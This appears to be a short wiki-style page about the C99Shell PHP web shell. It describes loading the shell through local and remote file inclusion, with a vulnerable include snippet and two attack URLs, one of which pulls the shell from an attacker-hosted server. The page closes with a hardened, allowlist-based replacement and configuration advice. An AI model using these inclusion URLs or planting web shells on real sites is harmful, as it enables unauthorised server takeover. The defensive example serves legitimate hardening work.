C99Shell
Description
c99shell is a single-file PHP script that can be called:
- locally via a Local File Inclusion (LFI) attack, if the file has been copied onto a compromised machine
- remotely via a Remote File Inclusion (RFI) attack, if the web application is vulnerable to such an attack.
Download
Usage
Local File Inclusion (LFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php if(isset($_GET["page"])) { require_once($_GET["page"]); } ... ?>
You can exploit the Local File Inclusion (LFI) vulnerability by calling C99shell this way:
http://www.somevulnerablesite/index.php?page=c99.txt
Remote File Inclusion (RFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php if(isset($_GET["page"])) { require_once($_GET["page"]); } ... ?>
You can exploit the Remote File Inclusion (RFI) vulnerability by calling C99shell this way:
http://www.somevulnerablesite/index.php?page=http://www.hackerssite/phpshells/c99.txt
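Both the LFI and the RFI case above come from the same line: the request value is passed straight to require_once. The following is an added example, not code from the original page, of a hardened index.php that closes both; the page names and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the vulnerable include in index.php.
// The page names and the pages/ directory are assumptions for illustration.

// Permitted "page" values mapped to files the application ships itself.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a file inside $baseDir,
 * or return null when the request must be refused.
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    // 1. Allowlist lookup: the request value is only ever used as an array
    //    key, so a value such as "c99.txt" or a URL never reaches require.
    //    (include/require parse any file as PHP, whatever its extension,
    //    which is why filtering on ".php" alone would not help.)
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }

    // 2. Defence in depth: canonicalise the path and confirm it is still
    //    under $baseDir after symlinks and ".." have been resolved.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Reject non-string input such as ?page[]=x before it is used.
$requested = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home';
$file = resolve_page($requested, __DIR__ . '/pages');

if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
require_once $file;
```

Setting allow_url_include = Off in php.ini (the default) additionally stops include/require from fetching http:// URLs, which blocks the RFI case but not the LFI case, so the allowlist is still needed.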